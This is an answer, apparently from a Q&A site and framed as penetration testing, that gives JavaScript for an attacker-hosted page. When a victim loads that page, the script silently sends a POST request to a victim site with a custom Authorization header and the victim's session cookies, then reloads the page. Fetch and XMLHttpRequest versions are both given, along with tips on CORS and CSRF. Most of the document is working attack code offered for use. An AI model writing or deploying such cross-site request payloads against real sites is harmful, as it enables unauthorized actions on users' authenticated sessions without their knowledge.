渗透测试需求:构造自定义Header的POST请求并实现页面重加载
I get it—traditional HTML forms fall short here because they don’t let you set custom HTTP headers like Authorization. Let’s fix that with modern JavaScript, which gives you full control over the request headers and behavior.
Why Traditional Forms Fail
The core flaw with using a standard
<form>element is that browsers handle HTTP headers automatically for form submissions. You can’t manually inject custom headers likeAuthorization—the browser only sends standard headers likeContent-TypeorCookiebased on form settings. This makes forms useless for your use case.
Working Implementation with Fetch API
Add this script to your www.attacker.com page. It will automatically send the POST request when a victim loads the page, then reload the page regardless of whether the request succeeded or failed:
// Run as soon as the page finishes loading window.addEventListener('load', async () => { const targetEndpoint = 'https://www.victim.com/your-target-path'; // Replace with the actual endpoint const authToken = 'xxxxx'; // Your custom Authorization token // Build your request body (adjust format to match what the target expects) const requestPayload = JSON.stringify({ exampleField: 'exampleValue' // Add any other required body parameters here }); try { // Send the POST request with custom headers const response = await fetch(targetEndpoint, { method: 'POST', headers: { 'Authorization': authToken, 'Content-Type': 'application/json' // Update this if the target uses form-data instead }, body: requestPayload, credentials: 'include' // Include this if the target requires session cookies for authentication }); // Optional: Log success for testing (won't be visible to the victim) console.log('Request sent:', response.status); } catch (error) { // Catch errors like network issues or CORS blocks (again, testing-only) console.error('Request failed:', error); } finally { // Force page reload after the request attempt window.location.reload(); } });
Key Notes for Adjustments
- Request Body Format: If the target expects form-encoded data instead of JSON, swap out the
Content-Typeand payload:const requestPayload = new URLSearchParams({ exampleField: 'exampleValue' }); // Update headers to: headers: { 'Authorization': authToken, 'Content-Type': 'application/x-www-form-urlencoded' } - CORS Considerations: If the target site has strict CORS policies, the browser might block the request. For penetration testing, this could mean you need to check if the target allows cross-origin requests with custom headers, or if you can leverage CSRF bypasses (though CSRF typically works with standard form submissions, not custom headers).
- Credentials: Use
credentials: 'include'only if you need to send the victim’s session cookies to the target (e.g., for authenticated actions). If not, you can omit this or set it to'same-origin'.
Alternative: XMLHttpRequest (Legacy Support)
If you need to support older browsers that don’t have Fetch API, use this XHR version instead:
window.addEventListener('load', () => { const xhr = new XMLHttpRequest(); xhr.open('POST', 'https://www.victim.com/your-target-path'); // Set custom headers xhr.setRequestHeader('Authorization', 'xxxxx'); xhr.setRequestHeader('Content-Type', 'application/json'); xhr.onload = () => { // Reload after request completes window.location.reload(); }; xhr.onerror = () => { // Reload even if there's an error window.location.reload(); }; // Send the request body xhr.send(JSON.stringify({ exampleField: 'exampleValue' })); });
内容的提问来源于stack exchange,提问作者LuchinQG

